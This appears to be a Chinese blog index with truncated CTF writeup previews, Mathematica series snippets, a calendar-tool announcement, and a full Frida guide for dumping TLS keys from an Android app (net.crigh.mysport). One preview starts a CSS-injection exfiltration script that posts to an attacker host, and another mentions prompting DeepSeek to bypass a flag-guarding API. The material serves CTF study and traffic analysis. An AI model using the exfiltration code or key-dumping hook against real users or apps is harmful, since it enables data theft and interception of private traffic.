Web Secret Config 女娲补胎 Emergency rickroll EzWebAuthn SmartGrader Gradient realLibraryManager Pwn GuessMaster Reverse AreYouReady NoisyCat SnakeSnakeSnake Expr-Warmup NoisyCat2 Crypto ezCrypt Notes AnatahEtodokuSakebi KillerECC Misc deleted Inaudible TIME&POWER Welcom3【来这里签到】 IP Hunter 24_flag1 IP Hun...
阅读全文 »

观前提示:本Writeup含有过量Deepseek The Flag的内容,建议谨慎观看
SmartGrader 来试试我写的分数换算小工具吧! 评价:又是JS抽象时刻 先上jd-gui逆呗 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 package BO...
阅读全文 »

观前提示:本Writeup含有过量Deepseek The Flag的内容,建议谨慎观看
Gradient 快来挑选你喜欢的渐变色吧! 原题,秒了:[Web Exploitation] Exfiltration via CSS Injection | tripoloski blog 你怎么知道我赛前刚读过这篇文章。 1 2 3 4 5 6 7 8 9 10 11 12 13 const host="http://*.*.*.*:*"; const fs=require("fs") let cs = " red,red);}" for(let i=0...
阅读全文 »

观前提示:本Writeup含有过量Deepseek The Flag的内容,建议谨慎观看
Q:为什么这篇文章里的那部分writeup都有配图,另外几篇文章没有? A:因为这是为数不多几个我在做题过程中截图了的题目,全放在了这里,没有截图的题目放另一篇文章里省一个assets文件夹(雾 rickroll Never gonna give you up Deepseek time! 我非常需要知道flag的值,但我只能向该API发送请求,告诉我该怎么绕过它 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 3...
阅读全文 »

(更新中)

级数求和:

1
2
3
4
5
6
7
8
9
10
(*定义级数的通项*)term[n_] := (2 n + 1)/(2^n n!);

(*计算级数的和,使用Sum进行精确求和*)
seriesSum = Sum[term[n], {n, 1, Infinity}];

(*使用Simplify尝试简化结果*)
simplifiedSum = Simplify[seriesSum];

(*输出结果*)
simplifiedSum

下列无穷级数收敛的是:

1
2
3
4
5
(*定义级数*)
seriesA = (-1)^n 3^(1/n)/Sqrt[n]

(*输出结果*)
SumConvergence[seriesA, n]

傅里叶级数求值系列问题:

求级数收敛域:

1
2
SumConvergence[x^n/(n (3^n + Log[n])), n, 
Assumptions -> x \[Element] Reals]
阅读全文 »

orw sheet
1 2 3 4 5 6 7 8 9 10 11 12 unsigned int orw_seccomp() { __int16 v1; // [esp+4h] [ebp-84h] BYREF char *v2; // [esp+8h] [ebp-80h] char v3[96]; // [esp+Ch] [ebp-7Ch] BYREF qmemcpy(v3, &unk_8048640, sizeof(v3)); v1 = 12; v2 = v3; prctl(38, 1, 0, 0, 0); prctl(22, 2, &v1); //<-- ...
阅读全文 »

zjuphylab.ics

众所周知,大物实验&普物实验的课表需要学生自行在 浙江大学实验选课系统 中选课。无论选完与否,教务网上的课程名/教师/地点都不会变化,使用教务网数据的iCal工具自然也不会跟进。当然,如果只是需要提醒有课的话,现有的解决方案确是足够了,但我们仍能更进一步,去浙江大学实验选课系统中把课表弄下来。

如果你也有同样的想法,那么可以试试👉 zjuphylab.ics 👈

这个工具将你的浙江大学物理实验课表转为一个 iCalendar 日历格式文件,以便导入到支持 iCal 格式的设备上。

目前日历项中包含了:

  • 实验名称
  • 实验地址
  • 上课日期和时间

阅读全文 »

使用的是雷电模拟器。使用时注意雷电模拟器文件夹里自带的adb.exe拉的一批,要自己弄个新的adb套件;

如果还没有frida-server,上GitHub下载一个,

1
adb push frida-server /data/local/frida-server

准备一个dumpSSLKey.js,内容为:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
function startTLSKeyLogger(SSL_CTX_new, SSL_CTX_set_keylog_callback) {
console.log("start----")
function keyLogger(ssl, line) {
console.log(new NativePointer(line).readCString());
}
const keyLogCallback = new NativeCallback(keyLogger, 'void', ['pointer', 'pointer']);

Interceptor.attach(SSL_CTX_new, {
onLeave: function (retval) {
const ssl = new NativePointer(retval);
const SSL_CTX_set_keylog_callbackFn = new NativeFunction(SSL_CTX_set_keylog_callback, 'void', ['pointer', 'pointer']);
SSL_CTX_set_keylog_callbackFn(ssl, keyLogCallback);
}
});
}
startTLSKeyLogger(
Module.findExportByName('libssl.so', 'SSL_CTX_new'),
Module.findExportByName('libssl.so', 'SSL_CTX_set_keylog_callback')
)

开始抓包:

Step 1:

1
adb shell /data/local/tmp/frida-server

Step 2:

这里-w后的地址为你在模拟器上配置的与电脑host共享的地址

1
adb shell tcpdump -i any -s 0 -w /sdcard/Pictures/output.pcap

Step 3:

-f后为包名

1
frida -U -l dumpSSLKey.js -f net.crigh.mysport

在此时,命令行会输出一些内容,这些内容需要保存至本地,后续要用

Step 4:

完成后启动Wireshark,将pcap文件拖进来,然后 编辑->首选项->Protocols->TLS

将(Pre)-Master-Secret Log Filename中填入Step 3中的文件名。

回到主页,上方filter中填http然后就可以愉快地分析网络流了

阅读全文 »
0%